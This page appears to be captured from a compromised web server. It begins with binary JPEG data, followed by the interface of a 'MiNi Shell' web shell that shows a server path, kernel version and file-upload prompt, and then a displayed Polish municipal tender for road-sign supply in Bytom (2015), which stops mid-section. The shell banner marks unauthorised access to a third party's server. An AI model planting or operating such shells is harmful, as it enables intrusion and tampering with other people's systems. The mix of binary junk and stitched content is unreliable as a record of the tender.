JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151110/303516-N-2015.html

<p class="kh_header"><b>Bytom: Dostawa i utrzymanie oznakowania pionowego na terenie miasta Bytomia w 2016 roku.</b><br>
<b>Numer ogłoszenia: 303516 - 2015; data zamieszczenia: 10.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bytom - Miejski Zarząd Dróg i Mostów , ul. Smolenia 35, 41-902 Bytom, woj. śląskie, tel. 032 3969700, faks 032 3969702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzdim.bytom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i utrzymanie oznakowania pionowego na terenie miasta Bytomia w 2016 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa i utrzymanie oznakowania pionowego na terenie miasta Bytomia                w 2016r., obejmujące: dostawę elementów oznakowania, które są wyszczególnione w TABELI 1 (materiał) oraz wykonanie usług, które są wyszczególnione w TABELI 2 (usługi).
2.	Wykonawca winien skalkulować ceny biorąc pod uwagę założenia do kalkulacji jednostkowych stanowiące załącznik nr 1 do niniejszej SIWZ.
3.	Wykonawca winien zaproponować okres gwarancji i rękojmi na materiały służące do realizacji zamówienia zgodny z gwarancją producenta, natomiast na montaż nie krótszy niż 12 miesięcy. Zamawiający określa minimalny wymagany 12-miesięczny okres gwarancji i rękojmi na montaż, liczony od dnia końcowego odbioru robót (zgodnie z protokołem końcowym). 
Zaoferowany przez Wykonawcę okres gwarancji i rękojmi będzie stanowił jedno z kryteriów oceny ofert, punktowane zgodnie z cz. XIII SIWZ.  
4.	Zamawiający przewiduje montaż znaków drogowych z odzysku, które odbierane będą z zasobów magazynowych Zamawiającego (lokalizacja - Bytom, ul. Smolenia 35). 
5.	Zamawiający przewiduje w trakcie realizacji zamówienia następujące rodzaje i orientacyjne (szacunkowe) ilości materiałów i usług do wykonania:
TABELA NR 1 - MATERIAŁ
Lp.	Materiał	Orientacyjna (szacunkowa)
ilość 	Jedn.
1	Znaki kat. A  900 mm ( średnie )  folia typu I    	40	szt.
2	Znak kat. A-7  900 mm ( średni )  folia typu II	20	szt.
3	Znaki kat. A  750 mm ( małe )  folia typu I    	40	szt.
4	Znaki kat. B i C   800 mm (średnie)  folia typu I	70	szt.
5	Znak  kat.  B-2 lub B-20  800 mm (średni)  folia typu II	40	szt.
6	Znaki kat. B i C  600 mm (małe)  folia typu I	70	szt.
7	Znaki z grupy D 600 x 600 mm (średnie i małe)  folia typu I  	70	szt.
8	Znaki z grupy D 400 x 400 ( mini ) folia typu I	30	szt.
9	Znak z grupy D 600 x 750 mm  ( średnie i małe )  folia typu I	15	szt.
10	Znak kat. D-6  600 x 600 mm  ( średni i mały )  folia typu II  	20	szt.
11	Znaki z grupy E, F, G, T, U  tablice typu B i D    folia typu I	140	m2
12	Słupek ( ocynk  ) o średnicy 60 mm ; grubość ścianki rury 2,8 - 3,2 mm	1350	m
13	Słupek ( ocynk ) o średnicy 76 mm ; grubość ścianki rury 2,8 - 3,2  mm	250	m
14	Znaki z grupy E, F, G, T, U  tablice typu B i D    folia typu II	20	m2
15	Wysięgnik	5	szt.
16	Obejma uniwersalna na słupek ( ocynk )	800	szt.
17	Obejma uniwersalna na latarnię ( ocynk )	280	szt.
18	Folia odblaskowa ( w różnych kolorach ) typu I do zaklejenia ( przeklejenia ) istniejącej tarczy znaku lub tablicy 	5	m2
19	Konstrukcja kratowa do tablic  ( słupki o średnicy 70 - 76 mm )	30	mb
20	Próg zwalniający: szerokość 900 mm, długość  500 mm, wysokość 50 mm	160	szt.
21	Próg zwalniający - element zakończenia: szerokość 900 mm, długość  420 mm, wysokość 50 mm	40	szt.
22	Azyl dla pieszych 500 x 500 x 100 mm  ( kwadrat lub element narożny )	30	szt.
23	Lustro drogowe U-18a - 800 mm ( kompletne w ramie wraz z uchwytami montażowymi )	10	szt.
24	Lustro drogowe U-18b - 800 x 1000 mm ( kompletne w ramie wraz z uchwytami montażowymi )	10	szt.
25	Punktowy element odblaskowy z dwóch stron  tzw. kocie oczko	30	szt.
26	Punktowy element odblaskowy z jednej strony tzw. kocie oczko	30	szt.
27	Słupek przeszkodowy U-5a z elementami odblaskowymi - aplikacja folią odblaskową typu II ( II generacji ) nasadzany na słupek stalowy	20	szt.

TABELA NR 2 - USŁUGI

Lp.	Usługi	Orientacyjna (szacunkowa)
Ilość	Jedn.
1	Montaż tarczy znaku o pow. < 0,3 m2 łącznie z kosztami transportu	170	szt.
2	Montaż tarczy znaku o pow. > 0,3 m2 łącznie z kosztami transportu	350	szt.
3	Demontaż tarczy znaku łącznie z kosztami transportu	200	szt.
4	Montaż słupka do znaku lub tablicy o średnicy 60 mm ( lub żelbetowego ) wraz z: - zabetonowaniem ( fundament ), - kosztami transportu, - odwozem i utylizacją gruzu / ziemi,  - przywróceniem nawierzchni do stanu pierwotnego 
( ułożeniem istn. bruku, płytek chodnikowych, uporządkowaniem zieleńca ) 	450	szt.
5	Montaż słupka do znaku lub tablicy o średnicy 76 mm ( lub żelbetowego ) wraz z: - zabetonowaniem ( fundament ), - kosztami transportu, - odwozem i utylizacją gruzu / ziemi,  - przywróceniem nawierzchni do stanu pierwotnego 
( ułożeniem istn. bruku, płytek chodnikowych, uporządkowaniem zieleńca )	50	szt.
6	Demontaż słupka do znaku lub tablicy wraz z : - kosztami transportu,
- zasypaniem otworu po słupku ( piaskiem ),  - przywróceniem nawierzchni do stanu pierwotnego ( ułożeniem istn. bruku, płytek chodnikowych,  uporządkowaniem zieleńca )	80	szt.
7	Montaż tablicy lub drogowskazu o pow. < 1,5 m2 łącznie z kosztami transportu	100	szt.
8	Montaż tablicy lub drogowskazu o pow. > 1,5 m2  (z paneli lub w całości) łącznie z kosztami transportu	20	szt.
9	Montaż kratownicy do tablic wraz z : - zabetonowaniem ( fundament ),
- kosztami transportu, - odwozem i utylizacją gruzu / ziemi, - przywróceniem nawierzchni do stanu pierwotnego ( ułożeniem istn. bruku, płytek chodnikowych,  uporządkowaniem zieleńca ) 	10	szt.
10	Demontaż tablicy, drogowskazu o pow. < 1,5 m2 łącznie z kosztami transportu 	40	szt.
11	Demontaż tablicy, drogowskazu o pow. > 1,5 m2 (z paneli lub w całości) łącznie z kosztami transportu  	20	szt.
12	Montaż tablicy lub drogowskazu  o pow. > 1,5 m2  na konstrukcjach bramowych; na wiaduktach, mostach i kładkach nad jezdnią (z paneli lub w całości) wraz z ramą lub zawiesiami łącznie z kosztami transportu i obsługi pojazdów specjalistycznych 	20	szt.
13	Demontaż tablicy, drogowskazu o pow. > 1,5 m2 na konstrukcjach bramowych; na wiaduktach, mostach i kładkach nad jezdnią (z paneli lub w całości) łącznie z kosztami transportu i obsługi pojazdów specjalistycznych 	20	szt.
14	Prostowanie pogiętej tarczy znaku łącznie z kosztami transportu	20	szt.
15	Prostowanie pogiętego słupka do znaku łącznie z kosztami transportu	40	szt.
16	Betonowanie słupka do znaku (0,0156 m3) łącznie z kosztami transportu	60	szt.
17	Montaż elementu progu zwalniającego ( kotwienie progu ) łącznie z kosztami transportu	240	szt.
18	Demontaż elementu progu zwalniającego łącznie z kosztami transportu	40	szt.
19	Montaż  modułu azylu dla pieszych ( kotwienie elementu ) łącznie z kosztami transportu 	30	szt.
20	Demontaż modułu azylu dla pieszych łącznie z kosztami transportu	20	szt.
21	Montaż  punktowego elementu odblaskowego tzw. kocie oczko z zastosowaniem kleju termoplastycznego - łącznie z kosztami transportu	60	szt.
22	Montaż wysięgnika na ścianie budynku (przykręcanego na kołkach rozporowych i śrubach) - łącznie z kosztami transportu	5	szt.
23	Demontaż wysięgnika na ścianie budynku łącznie z kosztami transportu	5	szt.
24	Montaż słupka przeszkodowego U-5a (pylonu) 	40	szt.
25	Montaż lustra drogowego łącznie z kosztami transportu 	20	szt.
26	Przeklejenie tarczy znaku lub tablicy łącznie z kosztami transportu 	30	szt.

6.	Podczas prowadzenia prac w pasie drogowym należy dokonać ich prawidłowego oznakowania, które musi być zgodne z załącznikami do Rozporządzenia Ministra Infrastruktury z dnia 03 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. poz. 2181 z  późn. zm.).
7.	Podane wyżej ilości materiałów i usług są orientacyjne (szacunkowe), co oznacza że ich faktyczne ilości mogą odbiegać od założeń, gdyż zlecanie prac odbywać się będzie wg bieżących potrzeb Zamawiającego, na podstawie zleceń. Wynagrodzenie wykonawcy stanowić będzie iloczyn faktycznie wykonanych prac danego rodzaju i cen jednostkowych podanych w ofercie Wykonawcy, do wysokości łącznej ceny ofertowej..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.99.22.00-9, 45.23.32.90-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium w kwocie 4.800,00 zł (słownie: cztery tysiące osiemset złotych).
2.	Wadium może być wniesione w jednej lub kilku formach, o których mowa w art. 45 ust. 6 ustawy.
3.	W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
1/	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego - tj. Gmina Bytom - Miejski Zarząd Dróg i Mostów, 41-902 Bytom ul. Smolenia 35), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
2/	określenie wierzytelności, która ma być zabezpieczona gwarancją,  
3/	kwotę gwarancji,
4/	okres ważności gwarancji (nie może być krótszy niż okres związania ofertą),
5/	oświadczenie gwaranta, w którym zobowiązuje się on nieodwołalnie i bezwarunkowo do zapłaty kwoty wadium na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż zaszła jedna z przesłanek zatrzymania wadium wymienionych w ustawie Prawo zamówień publicznych.
Powyższe zapisy stosuje się również do poręczeń wskazanych w art. 45 ust 6 pkt 2 i 5 ustawy
4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek Zamawiającego: Getin Noble Bank O/Bytom: 43 1560 1049 0000 9030 0026 9731. 
5.	Wadium wnoszone w innych dopuszczalnych formach należy złożyć w oryginale w siedzibie Zamawiającego - 41-902 Bytom, ul. Smolenia 35 (II piętro - pok. nr 219 - Dział Zamówień Publicznych i Archiwizacji Dokumentacji). 
6.	Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium 
w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi wpływ środków na rachunek Zamawiającego i uznanie środków na tym rachunku przed upływem terminu składania ofert.
7.	Zamawiający zwraca wadium  na zasadach wskazanych w art. 46 ustawy. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 1a ustawy.
8.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
9.	Zgodnie z art. 46 ust. 4a ustawy Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy, co powodowało brak możliwości wybrania oferty z złożonej przez wykonawcę jako najkorzystniejszej.
10.	Zamawiający zatrzymuje też wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Wykonawca jest zobowiązany wykazać brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy. 
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunek dotyczący:
1/	posiadania wiedzy i doświadczenia:
Opis sposobu dokonywania oceny spełniania tego warunku:
Wykonawca winien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje dostawy związane z przedmiotem zamówienia i proporcjonalne do wartości zamówienia tj. polegające na dostawie elementów oznakowania pionowego wraz z usługą ich montażu na drogach publicznych o łącznej wartości co najmniej 200.000,00 zł brutto (w tym co najmniej jedno zamówienie (umowa) o wartości nie niższej niż 100.000,00 zł brutto) oraz załączyć dokumenty potwierdzające, że dostawy te zostały wykonane lub są wykonywane należycie.

W przypadku dostaw wykonywanych Zamawiający uzna spełnienie w/w warunku, jeżeli do dnia wyznaczonego na składanie ofert w w/w okresie nastąpiła realizacja dostaw wraz z usługą ich montażu na drogach publicznych na kwotę co najmniej 200.000,00 zł brutto (w tym co najmniej jedno zamówienie (umowa) o wartości nie niższej niż 100.000,00 zł brutto).

3.	Zamawiający oceni spełnianie w/w warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów wskazanych  w cz. VI SIWZ, które weryfikowane będą wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Wykonawca jest zobowiązany wykazać brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy. 
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunek dotyczący:

1/	dysponowania odpowiednim potencjałem technicznym:
Opis sposobu dokonywania oceny spełniania tego warunku:
Wykonawca winien wykazać, że dysponuje niezbędnymi do wykonania zamówienia narzędziami i urządzeniami, tj.:
- co najmniej jednym podnośnikiem koszowym, umożliwiającym montaż i demontaż tablic bramowych na wysokości co najmniej 5m;

3.	Zamawiający oceni spełnianie w/w warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów wskazanych  w cz. VI SIWZ, które weryfikowane będą wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Wykonawca jest zobowiązany wykazać brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy. 
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunek dotyczący:

1/  sytuacji ekonomicznej i finansowej :
  Opis sposobu dokonywania oceny spełniania tego warunku:
     Wykonawca winien wykazać, że posiada środki finansowe lub zdolność kredytową w kwocie co             najmniej 50.000,00 zł. 

3.	Zamawiający oceni spełnianie w/w warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów wskazanych  w cz. VI SIWZ, które weryfikowane będą wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 88</li>
<li>2 - okres gwarancji i rękojmi - 12</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
